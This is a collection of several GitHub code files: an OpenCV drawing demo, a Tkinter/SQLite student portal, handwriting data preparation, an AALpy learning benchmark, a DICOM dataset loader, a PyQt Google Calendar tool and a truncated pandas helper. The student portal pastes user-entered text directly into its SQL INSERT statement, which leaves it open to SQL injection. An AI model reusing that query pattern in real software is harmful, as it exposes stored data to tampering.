bottom-right corner of rectangle. \n    Drawing a green rectangle at the top-right corner of image.\n    \"\"\"\n    cv2.rectangle(frame,(384,0),(510,128),(0,255,0),3)\n\n    # draw circle\n    \"\"\"\n    To draw a circle, you need its center coordinates and radius. \n    Here we will draw a circle inside the rectangle drawn above , -1 for filled circle.\n    \"\"\"\n    cv2.circle(frame,(447,63), 63, (0,0,255), 4)\n    \n    # draw polygon\n    \"\"\"\n    To draw a polygon, first you need coordinates of vertices. Make those points into an array of shape ROWSx1x2 where ROWS are number of vertices and it should be of type int32. \n    Here we draw a small polygon with four vertices in yellow color.\n    \"\"\"\n    pts = np.array([[10,5],[20,30],[70,20],[50,10]], np.int32)\n    pts = pts.reshape((-1,1,2))\n    cv2.polylines(frame,[pts],True,(0,255,255))\n\n    # adding text\n    \"\"\"\n    To put text in images, you need to specify the following things.\n    Text data that you want to write\n    Position coordinates of where you want to put it (i.e. 
bottom-left corner where data starts).\n Font type (Check cv.putText() docs for supported fonts)\n Font Scale (specifies the size of font)\n regular things like color, thickness, lineType etc.\n For better look, lineType = cv.LINE_AA is recommended.\n \"\"\"\n # (frame, text, position, font, size/scale, color, thickness, cv2.LINE_AA)\n # cv2.LINE_AA is the line type\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(frame, 'OpenCV Test', (10,300), font, 2, (255,255,255), 2, cv2.LINE_AA)\n\n # display the frame\n cv2.imshow(\"Frame\", frame)\n\n # it will wait for 1 millisecond to capture next frame and also if the key q is pressed it will stop\n if cv2.waitKey(1) == ord('q'):\n break\n\n# releasing the capture when everything is done\ncap.release()\ncv2.destroyAllWindows()","repo_name":"milan-sony/open_cv-test","sub_path":"opencv_test4.py","file_name":"opencv_test4.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36257352433","text":"import sqlite3\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import *\r\n\r\n\r\nconnection=sqlite3.connect(\"Student_portal.db\")\r\n# connection = sqlite3.connect(\"student1.db\")\r\n\r\nstdportal=tk.Tk()\r\nstdportal.title(\" Student Portal \")\r\nstdportal.geometry(\"1100x500\")\r\n# stdportal.config(font=(\"Arial\" ,20))\r\n# stdportal.grid(row=0, column=0)\r\nheading=tk.Label(stdportal, text= \"Enter your Details below\", width=50)\r\nheading.config(font=(\"arial\", 18))\r\nheading.grid(row=0, column=1, pady=(10,10))\r\n\r\nstu_name=tk.Label(stdportal, text= \"Enter your name\", width=30)\r\nstu_name.config(font=(\"arial\", 15))\r\nstu_name.grid(row=1, column=0, pady=(10,10))\r\nStudent_name= tk.Entry(stdportal)\r\nStudent_name.config(font=(\"arial\", 30))\r\nStudent_name.grid(row=1, column=1, pady=(0,10))\r\n\r\nstu_Id=tk.Label(stdportal, text= \"Enter your ID\", width=30)\r\nstu_Id.config(font=(\"arial\", 15))\r\nstu_Id.grid(row=2, column=0, pady=(0,10) )\r\nStudent_ID= tk.Entry(stdportal)\r\nStudent_ID.config(font=(\"arial\", 30))\r\nStudent_ID.grid(row=2, column=1, pady=(0,10) )\r\n\r\n\r\nstu_college=tk.Label(stdportal, text= \"Enter your college\", width=30)\r\nstu_college.config(font=(\"arial\", 15))\r\nstu_college.grid(row=3, column=0, pady=(0,10) )\r\nStudent_college= tk.Entry(stdportal)\r\nStudent_college.config(font=(\"arial\", 30))\r\nStudent_college.grid(row=3, column=1, pady=(0,10) )\r\n\r\nstu_add=tk.Label(stdportal, text= \"Enter your address\", width=30)\r\nstu_add.config(font=(\"arial\", 15))\r\nstu_add.grid(row=4, column=0, pady=(0,10) )\r\nStudent_address= tk.Entry(stdportal)\r\nStudent_address.config(font=(\"arial\", 30))\r\nStudent_address.grid(row=4, column=1, pady=(0,10) )\r\n\r\nstu_ph=tk.Label(stdportal, text= \"Enter your phone\", width=30)\r\nstu_ph.config(font=(\"arial\", 15))\r\nstu_ph.grid(row=5, column=0, pady=(0,10) )\r\nStudent_phone= tk.Entry(stdportal)\r\nStudent_phone.config(font=(\"arial\", 30))\r\nStudent_phone.grid(row=5, column=1, pady=(0,10))\r\n\r\n# Table_name = \"student1_table\"\r\n\r\nTable_name1 = \"stdportal_table\"\r\nStudent_ID1 = \"stdportal_ID\"\r\nStudent_name1 = \"stdportal_name\"\r\nStudent_college1 = \"stdportal_college\"\r\nStudent_address1 = \"stdportal_address\"\r\nStudent_phone1 = \"stdportal_phone\"\r\n\r\ndef ret():\r\n global secondwinow\r\n secondwinow = tk.Tk()\r\n\r\n secondwinow.title(\"display result\")\r\n\r\n appLabel = tk.Label(secondwinow, text=\"Student 
management system\", fg=\"#06a099\", width=30)\r\n appLabel.config(font=(\"Sylfaen\", 25))\r\n appLabel.grid(row=0, column=1)\r\n\r\n tree = ttk.Treeview(secondwinow)\r\n tree[\"columns\"] = (\"one\", \"two\", \"three\", \"four\")\r\n tree.heading(\"one\", text=\"student name\")\r\n tree.heading(\"two\", text=\"college name\")\r\n tree.heading(\"three\", text=\"student address\")\r\n tree.heading(\"four\", text=\"student phone no.\")\r\n\r\n\r\n cursor =connection.execute(\"SELECT * FROM \" + Table_name1 + \" ;\")\r\n i = 0\r\n\r\n for row in cursor:\r\n tree.insert('', i, text=\"student\" + str(row[0]),\r\n values=(row[1], row[2], row[3], row[4]))\r\n i = i + 1\r\n\r\n tree.grid(row=2, column=1)\r\n connection.close()\r\n secondwinow.mainloop()\r\n\r\ndef input1():\r\n global Table_name1\r\n Table_name1 = \"stdportal_table\" # table name\r\n Student_ID1 = \"stdportal_ID\"\r\n Student_name1 = \"stdportal_name\"\r\n Student_college1 = \"stdportal_college\"\r\n Student_address1 = \"stdportal_address\"\r\n Student_phone1 = \"stdportal_phone\"\r\n\r\n\r\n ID1 = Student_ID.get()\r\n name1 = Student_name.get()\r\n college1 = Student_college.get()\r\n address1 = Student_address.get()\r\n phone1 = Student_phone.get()\r\n # stdportal.geometry(\"800+400+500+700\")\r\n\r\n\r\n connection.execute(\" CREATE TABLE IF NOT EXISTS \" + Table_name1 + \" ( \" + Student_ID1 + \" INTEGER PRIMARY KEY AUTOINCREMENT, \"\r\n + Student_name1 + \" TEXT, \" + Student_college1 + \" TEXT, \" + Student_address1\r\n + \" TEXT, \" + Student_phone1 + \" INTEGER);\")\r\n\r\n connection.execute(\" INSERT INTO \" + Table_name1 + \" ( \" + Student_name1 + \" , \" + Student_college1 + \" , \" + Student_address1 + \" , \"\r\n + Student_phone1 + \" ) VALUES ('\" + name1 + \"' , '\" + college1 + \"' , '\" + address1 + \"' , \" + str(phone1) + \" ); \")\r\n connection.commit()\r\n\r\n\r\ndef retr():\r\n cursor1 = connection.execute(\"SELECT * FROM \" + Table_name1 + \";\")\r\n for row in cursor1:\r\n print(\"Student ID id : \", row[0])\r\n print(\"Student name : \", row[1])\r\n print(\"Student college : \", row[2])\r\n print(\"Student address : \", row[3])\r\n print(\"Student phone number : \", row[4])\r\n\r\n connection.close()\r\n\r\n\r\nbutton= tk.Button(stdportal, text= \" LOGIN \" , command= lambda: input1())\r\nbutton.config(font=(\"arial\", 18))\r\nbutton.grid(row=7, column=1, pady=(0,10))\r\n\r\nretri = tk.Button(stdportal, text= \"Retrive the entered details : \" , command= lambda: retr())\r\nretri.config(font=(\"arial\", 18))\r\nretri.grid(row=8, column=0, pady=(0,10))\r\n\r\n\r\nlistoftable = tk.Button(stdportal, text= \" GET ENTERED VALUES : \" , command= lambda: ret())\r\nlistoftable.config(font=(\"arial\", 18))\r\nlistoftable.grid(row=8, column=1, pady=(0,10))\r\nstdportal.mainloop()\r\n","repo_name":"Anvi8/Student-Management-system","sub_path":"student management system.py","file_name":"student management system.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"732744324","text":"import random\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nfrom utils.chinese_char import chars_list_casia, chars_list2\r\nfrom utils.prepro import normLization01, normLization_11\r\nfrom PyQt5.QtCore import pyqtSignal, QSize, QPoint\r\nfrom PyQt5.QtGui import QPainter, QPainterPath\r\nfrom PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QApplication\r\nimport 
os\r\n\r\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\r\n\r\n\r\ndef show(file):\r\n f = open('./data/txt/' + file, 'r')\r\n X = []\r\n Y = []\r\n for l in f.readlines():\r\n X.append(float(l.split(',')[0]))\r\n Y.append(float(l.split(',')[1].strip('\\n')))\r\n d_x = np.max(X) - np.min(Y)\r\n d_y = np.max(Y) - np.min(Y)\r\n nw = d_x / d_y * 2\r\n plt.figure(figsize=(20, 3))\r\n # plt.plot(X, Y, linewidth=0.8, marker='.', markersize=2)\r\n plt.plot(X, Y, linewidth=0.8)\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef iahw_out_dict():\r\n file = open('./data/txt/iahcc_label_dict.txt')\r\n num = []\r\n char = []\r\n dt = {}\r\n for l in file.readlines():\r\n t = l.split('\\t')[0]\r\n if ',' in t:\r\n t = t.split(',')[0] + t.split(',')[1]\r\n num.append(int(t))\r\n char.append(l.split('\\t')[1])\r\n for i in range(len(num)):\r\n dt.setdefault(num[i], char[i])\r\n return dt\r\n\r\n\r\ndef hwdb_out_dict():\r\n file = open('./data/txt/hwdb_char_list.txt', encoding='utf-8')\r\n num = []\r\n t = 1\r\n char = []\r\n dt = {}\r\n for l in file.readlines():\r\n num.append(t)\r\n t += 1\r\n char.append(l.split('\\n')[0])\r\n for i in range(len(num)):\r\n dt.setdefault(num[i], char[i])\r\n return dt\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # f = open('./data/txt/old_casia_2247/train_data.txt', 'r', encoding='utf-8')\r\n # fe = open('./data/txt/old_casia_2247/cmp13_data.txt', 'r', encoding='utf-8')\r\n # x = []\r\n # y = []\r\n # for l in f.readlines():\r\n # for c in l.split('$')[1].strip('\\n'):\r\n # x.append(c)\r\n # for l in fe.readlines():\r\n # for c in l.split('$')[1].strip('\\n'):\r\n # y.append(c)\r\n # cnt = 0\r\n # for i in range(len(y)):\r\n # if y[i] not in x:\r\n # cnt += 1\r\n # print(len(y), cnt)\r\n\r\n # data = torch.load('./data/txt/iahcc/train_data_5.pt')\r\n # iahw_dt = iahw_out_dict()\r\n # hwdb_dt = hwdb_out_dict()\r\n # c = 0\r\n # while c < 1000:\r\n # cnt = 0\r\n # x = []\r\n # y = []\r\n # total = random.randint(14, 18)\r\n # x_max = 0\r\n # s = \"\"\r\n # while cnt < total:\r\n # k = random.randint(1, len(data))\r\n # d = data[k]['data']\r\n # label = data[k]['label']\r\n # if iahw_dt[label] in chars_list_casia:\r\n # cnt += 1\r\n # s += iahw_dt[label]\r\n # l = len(d[0])\r\n # distance = 4 * random.random()\r\n # for i in range(l):\r\n # x.append(d[0][i] + x_max + distance)\r\n # y.append(d[1][i])\r\n # x_max = max(x) + distance\r\n # print(s)\r\n # x, y = normLization_11(x, y)\r\n # if len(x) <= 2998:\r\n # with open('./data/txt/extra_data/iahw_extra_data_xy/iahw_' + str(c+3000) + '.txt', 'a+') as fout:\r\n # for i in range(len(x)):\r\n # fout.write(str(x[i]) + ',' + str(y[i]) + '\\n')\r\n # txt_file = open('./data/txt/iahw_extra_data.txt', 'a+')\r\n # txt_file.write('iahw_'+str(c+3000)+'.txt$'+s+'\\n')\r\n # c += 1\r\n\r\n # x, y = normLization01(x, y)\r\n # plt.plot(x, y)\r\n # plt.show()\r\n\r\n for fname in os.listdir('./data/txt/extra_data/iahw_extra_data_xy/'):\r\n x = []\r\n y = []\r\n file = open('./data/txt/extra_data/iahw_extra_data_xy/'+fname, 'r')\r\n for l in file.readlines():\r\n x.append(float(l.split(',')[0]))\r\n y.append(float(l.split(',')[1].strip()))\r\n count = len(open('./data/txt/extra_data/iahw_extra_data_xy/'+fname, 'r').readlines())\r\n if count < 2998:\r\n for i in range(2998 - count):\r\n x.append(0)\r\n y.append(0)\r\n for i in range(len(x)):\r\n with open('./data/txt/extra_data/iahw_extra_feature/'+fname,'a+') as fp:\r\n 
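# note: the feature file is reopened in append mode for every single point;\r\n                # hoisting this 'with open(...)' above the loop would write the same\r\n                # padded (x, y) pairs through one file handle\r\n                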
fp.write(str(x[i])+','+str(y[i])+'\\n')\r\n\r\n\r\n\r\n","repo_name":"xm1233/olhwr","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33231212818","text":"from statistics import mean\nimport csv\n\nfrom aalpy.SULs import DfaSUL, MealySUL, MooreSUL\nfrom aalpy.learning_algs import run_Lstar\nfrom aalpy.oracles import RandomWalkEqOracle\nfrom aalpy.utils import generate_random_dfa, generate_random_mealy_machine, generate_random_moore_machine\n\nnum_states = 1000\nalph_size = 5\n\nrepeat = 10\nnum_increases = 20\n\nstates = ['alph_size', alph_size]\ntimes_dfa = ['dfa_pypy_rs']\ntimes_mealy = ['mealy_pypy_rs']\ntimes_moore = ['moore_pypyrs']\n\ncex_processing = 'rs'\nfor i in range(num_increases):\n print(i)\n total_time_dfa = []\n total_time_mealy = []\n total_time_moore = []\n\n for _ in range(repeat):\n alphabet = list(range(alph_size))\n\n dfa = generate_random_dfa(num_states, alphabet=alphabet, num_accepting_states=num_states // 2)\n sul = DfaSUL(dfa)\n\n # eq_oracle = StatePrefixEqOracle(alphabet, sul, walks_per_state=5, walk_len=40)\n eq_oracle = RandomWalkEqOracle(alphabet, sul, num_steps=10000, reset_prob=0.09)\n\n _, data = run_Lstar(alphabet, sul, eq_oracle, cex_processing=cex_processing, cache_and_non_det_check=False,\n return_data=True, automaton_type='dfa')\n\n total_time_dfa.append(data['learning_time'])\n del dfa\n del sul\n del eq_oracle\n\n mealy = generate_random_mealy_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)\n sul_mealy = MealySUL(mealy)\n\n # eq_oracle = StatePrefixEqOracle(alphabet, sul_mealy, walks_per_state=5, walk_len=40)\n eq_oracle = RandomWalkEqOracle(alphabet, sul_mealy, num_steps=10000, reset_prob=0.09)\n\n _, data = run_Lstar(alphabet, sul_mealy, eq_oracle, cex_processing=cex_processing,\n cache_and_non_det_check=False,\n return_data=True, automaton_type='mealy')\n\n total_time_mealy.append(data['learning_time'])\n\n del mealy\n del sul_mealy\n del eq_oracle\n\n moore = generate_random_moore_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)\n moore_sul = MooreSUL(moore)\n\n # eq_oracle = StatePrefixEqOracle(alphabet, moore_sul, walks_per_state=5, walk_len=40)\n eq_oracle = RandomWalkEqOracle(alphabet, moore_sul, num_steps=10000, reset_prob=0.09)\n\n _, data = run_Lstar(alphabet, moore_sul, eq_oracle, cex_processing=cex_processing,\n cache_and_non_det_check=False,\n return_data=True, automaton_type='moore')\n\n total_time_moore.append(data['learning_time'])\n\n alph_size += 5\n states.append(alph_size)\n\n # save data and keep averages\n times_dfa.append(round(mean(total_time_dfa), 4))\n times_mealy.append(round(mean(total_time_mealy), 4))\n times_moore.append(round(mean(total_time_moore), 4))\n\nwith open('increasing_alphabet_experiments.csv', 'w') as f:\n wr = csv.writer(f, dialect='excel')\n wr.writerow(states)\n wr.writerow(times_dfa)\n wr.writerow(times_mealy)\n wr.writerow(times_moore)\n","repo_name":"DES-Lab/AALpy","sub_path":"Benchmarking/benchmark_alphabet_increase.py","file_name":"benchmark_alphabet_increase.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"7"} +{"seq_id":"23647017198","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 2019\n@author: Subin Joo\ncheckDicom3: add Augmentation, age output\n\"\"\"\nfrom os import listdir\nfrom os.path import isfile, 
join\nimport csv\nimport pydicom\nfrom pydicom.data import get_testdata_files\nfrom PIL import Image\nimport numpy as np\nimport random\nimport torch\n\n# convert grayscale * 3 -> rgb\ndef convert1Dto3D(imgArr):\n    out=[imgArr for i in range(3)]\n    return np.stack(out)\n\n# load all files -> separate abnormal/normal -> shuffle respectively -> merge 6000 abnormal + 6000 normal -> shuffle again\ndef rearrange(onlyfiles,listId,listLabel): \n    fileName_abnormal,fileName_normal=[],[]\n    for oneFile in onlyfiles: # scan dicom file\n        if listLabel[listId.index(oneFile[:-4])] == '1': # if dicom file is pneumonia patient\n            fileName_abnormal.append(oneFile) # add filename in abnormal list -> total 6012\n        else:\n            fileName_normal.append(oneFile) # normal list -> total 20672\n    \n    # abnormal random 6000 datasets + normal random 6000 datasets\n    onlyfiles_re=random.sample(fileName_abnormal,6000)+random.sample(fileName_normal,6000)\n    \n    return random.sample(onlyfiles_re,12000) # random shuffle\n\nclass dataLoad01:\n    def __init__(self,resize=(224,224),ratioTraining=0.9,numOfDicom=1000,scale=\"gray\"): \n        # step1: load dicom file\n        dataDir='stage_2_train_images'\n        onlyfiles = [f for f in listdir(dataDir) if isfile(join(dataDir, f))]\n        \n        # step2: load csv file\n        dataDir_csv='stage_2_train_labels.csv'\n        listId,listLabel = [],[]\n        with open(dataDir_csv) as csv_file:\n            csv_reader = csv.reader(csv_file, delimiter=',')\n            for i, oneline in enumerate(csv_reader):\n                if i>0:\n                    listId.append(oneline[0]) # Dicom file name\n                    listLabel.append(oneline[5]) # patient or not\n        \n        # step3: shuffle data + balancing data, patients:normal -> 50:50 (nearly, not exact)\n        onlyfiles=rearrange(onlyfiles,listId,listLabel)\n        \n        # step4: create Full image List\n        images,labels=[],[]\n        ageLabels=[]\n        for i, oneFile in enumerate(onlyfiles[:numOfDicom]):\n            if oneFile[:-4] in listId:\n                if (i%100 == 0): print(\"in progress : %d / %d \" %(i,len(onlyfiles)) )\n                \n                # load dicom\n                filename= dataDir + '/' + oneFile\n                dataset = pydicom.dcmread(filename)\n                \n                # dicom -> image -> resize (with ANTIALIAS) -> array\n                arr2img=dataset.pixel_array\n                img = Image.fromarray(arr2img)\n                img.thumbnail(resize, Image.ANTIALIAS) \n                \n                img=(np.array(img,dtype=np.int16) - 128) / 128 # img > numpy array, normalization\n                if scale == \"gray\":\n                    img_reshape=img.reshape((1,img.shape[0],img.shape[1])) # (224,224) -> (1,224,224)\n                elif scale == \"rgb\":\n                    img_reshape=convert1Dto3D(img) # (224,224) -> (3,224,224)\n                \n                images.append(img_reshape) # image list\n                labels.append(int(listLabel[listId.index(oneFile[:-4])])) # label list\n                \n                # patient age\n                ageLabels.append(int(dataset.PatientAge)/100) # age 0 ~ 100 -> convert 0.0 ~ 1\n        \n        images = np.stack(images) # 3D -> 4D (1,224,224) -> (:,1,224,224)\n        \n        size=images.shape[0] # number of total dataset \n        numOfTraining=int(size*ratioTraining)\n        \n        # separate dataset\n        self.images_train=images[:numOfTraining,:,:,:]\n        self.images_test=images[numOfTraining:,:,:,:]\n        \n        self.labels_train=labels[:numOfTraining]\n        self.labels_test=labels[numOfTraining:]\n        \n        self.age_train=ageLabels[:numOfTraining]\n        self.age_test=ageLabels[numOfTraining:]\n        \n        self.sizeTrain,self.sizeTest = self.images_train.shape[0], self.images_test.shape[0]\n        print(\"train datasets size: \"+str(self.images_train.shape))\n        print(\"test datasets size: \"+str(self.images_test.shape))\n        \n        # count number of call\n        self.countBatch = 0\n        self.countTestData = 0\n    \n    def batch(self,batch_size=4): # load a few samples of dataset for training\n        rangeStart = self.countBatch * 
batch_size\n        rangeEnd = (self.countBatch + 1) * batch_size\n        \n        selectedImage=self.images_train[rangeStart:rangeEnd,:,:,:]\n        labels=np.array(self.labels_train)\n        selectedLabel=labels[rangeStart:rangeEnd]\n        \n        agelabels=np.array(self.age_train)\n        selectedAgeLabel=agelabels[rangeStart:rangeEnd]\n        \n        self.countBatch +=1\n        if ( (self.countBatch + 1) * batch_size) > self.sizeTrain: # if rangeEnd is bigger than total size -> initialization\n            self.countBatch = 0\n        \n        return torch.tensor(selectedImage).float(),torch.tensor(selectedLabel).long(),torch.tensor(selectedAgeLabel).float()\n    \n    def testData(self,batch_size=4): # load a few samples of dataset for testing\n        rangeStart = self.countTestData * batch_size\n        rangeEnd = (self.countTestData + 1) * batch_size\n        \n        selectedImage=self.images_test[rangeStart:rangeEnd,:,:,:]\n        labels=np.array(self.labels_test)\n        selectedLabel=labels[rangeStart:rangeEnd]\n        \n        agelabels=np.array(self.age_test)\n        selectedAgeLabel=agelabels[rangeStart:rangeEnd]\n        \n        self.countTestData +=1\n        if ( (self.countTestData + 1) * batch_size) > self.sizeTest: # if rangeEnd is bigger than total size -> initialization\n            self.countTestData = 0\n        \n        return torch.tensor(selectedImage).float(),torch.tensor(selectedLabel).long(),torch.tensor(selectedAgeLabel).float()\n    \n    def augmentation_Gaussian_noise(self,mu=0.0,sigma=10.0):\n        print(\"\\naugmentation : Gaussian noise\")\n        # train datasets\n        addNoise = self.images_train+(np.random.normal(mu, sigma,self.images_train.shape)-128.0)/128.0 # original data + noise\n        self.images_train = np.vstack((self.images_train,addNoise))\n        \n        self.labels_train = self.labels_train + self.labels_train # list + list\n        self.age_train = self.age_train + self.age_train # list + list\n        \n        # test datasets\n        addNoise = self.images_test+(np.random.normal(mu, sigma,self.images_test.shape)-128.0)/128.0 # original data + noise\n        self.images_test = np.vstack((self.images_test,addNoise))\n        \n        self.labels_test = self.labels_test + self.labels_test # list + list\n        self.age_test = self.age_test + self.age_test # list + list\n        \n        # update size of datasets\n        self.sizeTrain,self.sizeTest = self.images_train.shape[0], self.images_test.shape[0]\n        print(\"train datasets size: \"+str(self.images_train.shape))\n        print(\"test datasets size: \"+str(self.images_test.shape))\n\n    def augmentation_Image_flip(self): \n        print(\"\\naugmentation : Image flip left<>right\")\n        # train datasets\n        fliped = np.flip(self.images_train, 3) # images_train -> (numOfimage, rgb, y, x) -> flip 4th axis\n        self.images_train = np.vstack((self.images_train,fliped))\n        \n        self.labels_train = self.labels_train + self.labels_train # list + list\n        self.age_train = self.age_train + self.age_train # list + list\n        \n        # test datasets\n        fliped = np.flip(self.images_test, 3) # images_test -> (numOftest, rgb, y, x) -> flip 4th axis\n        self.images_test = np.vstack((self.images_test,fliped))\n        \n        self.labels_test = self.labels_test + self.labels_test # list + list\n        self.age_test = self.age_test + self.age_test # list + list\n        \n        # update size of datasets\n        self.sizeTrain,self.sizeTest = self.images_train.shape[0], self.images_test.shape[0]\n        print(\"train datasets size: \"+str(self.images_train.shape))\n        print(\"test datasets size: \"+str(self.images_test.shape))\n    \n    ","repo_name":"subinjoo/public","sub_path":"kaggle/RSNA_1904/checkDicom3.py","file_name":"checkDicom3.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1310787712","text":"import logging\nfrom typing import Any, List, Set\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QMessageBox\n\nfrom bulk_reminders import api\nfrom bulk_reminders.api import Event\nfrom bulk_reminders.gui_base import Ui_MainWindow\nfrom bulk_reminders.load import LoadDialog\nfrom bulk_reminders.oauth import OAuthDialog\nfrom bulk_reminders.undo import IDPair\n\nlogging.basicConfig(format='[%(asctime)s] [%(levelname)s] [%(threadName)s] %(message)s')\nlogger = logging.getLogger(__file__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, *args, **kwargs):\n # Initial UI setup\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setupUi(self)\n logger.debug('UI Initialized.')\n self.show()\n\n self.calendar = api.Calendar()\n self.currentCalendarID = 'primary'\n\n # Authenticate user into Google API Engine\n self.authenticated = self.calendar.authenticate_via_token()\n if not self.authenticated:\n temp_dialog = OAuthDialog(callback=self.calendar.authenticate_via_oauth)\n temp_dialog.show()\n self.calendar.setupService()\n\n # Get Calendars, Setup Calendar Selection Combobox\n calendars = self.calendar.getCalendarsSimplified()\n self.comboModel = QtGui.QStandardItemModel()\n for id, summary in calendars:\n item = QtGui.QStandardItem(summary)\n item.setData(id)\n self.comboModel.appendRow(item)\n self.calendarCombobox.setModel(self.comboModel)\n self.calendarCombobox.currentIndexChanged[int].connect(self.comboBoxChanged)\n\n # Make sure the current calendar ID matches up\n self.currentCalendarID = self.comboModel.item(self.calendarCombobox.currentIndex()).data()\n\n # Setup Column View headers\n self.eventsView.setColumnCount(4)\n self.eventsView.setHorizontalHeaderLabels(['Summary', 'Status', 'Start', 'End'])\n header = self.eventsView.horizontalHeader()\n header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)\n header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)\n header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)\n self.eventsView.verticalHeader().hide()\n\n self.undoButton.clicked.connect(self.undo)\n self.submitButton.clicked.connect(self.submit)\n\n self.history: List[IDPair] = []\n self.historyCalendarID: str = ''\n\n # Disable the undo button until undo stages are available\n if len(self.history) == 0:\n self.undoButton.setDisabled(True)\n\n self.loadEventsButton.clicked.connect(self.load_events)\n self.cachedLoadText = ''\n self.readyEvents: List[Event] = []\n self.apiEvents: List[dict] = []\n\n self.populate()\n\n def load_events(self) -> None:\n \"\"\"Open the event loading dialog\"\"\"\n dial = LoadDialog()\n dial.plainTextEdit.setPlainText(self.cachedLoadText)\n result = dial.exec()\n\n if result == QMessageBox.Accepted:\n self.cachedLoadText = dial.plainTextEdit.toPlainText()\n self.readyEvents = dial.parsed\n self.populate()\n\n def undo(self) -> None:\n \"\"\"Get the latest undo stage and delete all events in that stage\"\"\"\n logging.info(f'Deleting {len(self.history)} Events from Calendar {self.historyCalendarID}')\n\n self.progressBar.show()\n self.progressBar.setMaximum(len(self.history))\n for i, entry in enumerate(self.history):\n logging.debug(f'Deleting Event {entry.eventID}')\n self.calendar.service.events().delete(calendarId=entry.calendarID, eventId=entry.eventID).execute()\n self.progressBar.setValue(i + 1)\n 
self.progressBar.hide()\n\n        # Disable the undo button until undo stages are available\n        self.history = []\n        self.undoButton.setDisabled(len(self.history) == 0)\n        self.populate() # Refresh\n\n    def getForeign(self) -> Set[Any]:\n        \"\"\"Returns all events currently tracked that are not stored in the undo.\"\"\"\n        foreign = {event.get('id'): event for event in self.apiEvents}\n        undoableIDs = set(pair.eventID for pair in self.history)\n        # foreign events are the API events whose IDs this session did not create\n        return {foreign[eventID] for eventID in set(foreign.keys()).difference(undoableIDs)}\n\n    def submit(self) -> None:\n        self.historyCalendarID = self.currentCalendarID\n        self.history = []\n\n        logger.info(f'Submitting {len(self.readyEvents)} events to API')\n\n        self.progressBar.show()\n        self.progressBar.setMaximum(len(self.readyEvents))\n        for i, event in enumerate(self.readyEvents):\n            logger.debug(f'Submitting \"{event.summary}\" scheduled to start on {event.start.isoformat()}....')\n            result = self.calendar.service.events().insert(calendarId=self.currentCalendarID, body=event.body).execute()\n            self.history.append(IDPair(self.currentCalendarID, result.get('id')))\n            self.progressBar.setValue(i + 1)\n\n        self.undoButton.setDisabled(len(self.history) == 0)\n        self.readyEvents.clear()\n        self.progressBar.hide()\n\n        self.populate()\n\n    def populate(self) -> None:\n        \"\"\"Re-populate the table with all of the events\"\"\"\n        self.apiEvents = self.calendar.getEvents(self.currentCalendarID)\n\n        events = list(self.readyEvents)\n        events.extend([Event.from_api(event, self.history) for event in self.apiEvents])\n\n        ready, undoable, foreign = len(self.readyEvents), len(self.history), len(list(self.getForeign()))\n        total = ready + undoable + foreign\n        self.eventCountLabel.setText(f'{len(self.readyEvents)} ready, {undoable} undoable, {foreign} foreign ({total})')\n\n        self.eventsView.setRowCount(len(events))\n        logger.debug(f'Populating table with {self.eventsView.rowCount()} events.')\n        for row, event in enumerate(events):\n            logger.debug(f'Event \"{event.summary}\" starts {event.start} and ends {event.end}')\n            event.fill_row(row, self.eventsView)\n\n        self.submitButton.setDisabled(len(self.readyEvents) == 0)\n\n    @QtCore.pyqtSlot(int)\n    def comboBoxChanged(self, row) -> None:\n        \"\"\"When the Calendar Selection combobox changes, switch to that calendar and re-populate.\"\"\"\n        self.currentCalendarID = self.comboModel.item(row).data()\n        logger.info(f'Switching to Calendar \"{self.comboModel.item(row).text()} ({self.currentCalendarID})\"')\n        self.populate()\n","repo_name":"Xevion/bulk-reminders","sub_path":"bulk_reminders/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"34660608875","text":"def compute_rolling(new_cols, current_cols, teams):\n\n    teams = teams.sort_values('Date')\n    five_day_ave = teams[current_cols].rolling(5,closed ='left').mean()\n    teams[new_cols] = five_day_ave\n\n\n    if len(teams) == 31:\n        # get the team's rank from their most recent game\n\n        recent_rank = teams.iloc[len(teams)- 2]['Rank']\n        teams.at[teams.index[len(teams) -1],'Rank'] = recent_rank\n\n    elif len(teams) == 32:\n\n        # account for double headers \n        recent_rank = teams.iloc[len(teams)- 3]['Rank']\n        teams.at[teams.index[len(teams) -2],'Rank'] = recent_rank\n\n        # save index to reassign\n        prev_index = teams.iloc[len(teams)-1][0]\n\n        # set the double header games to the same values\n        teams.iloc[len(teams)-1]= teams.iloc[len(teams)-2]\n        teams.at[teams.index[len(teams) -1],0] = prev_index\n\n    teams = teams.dropna(subset=new_cols)\n\n    return 
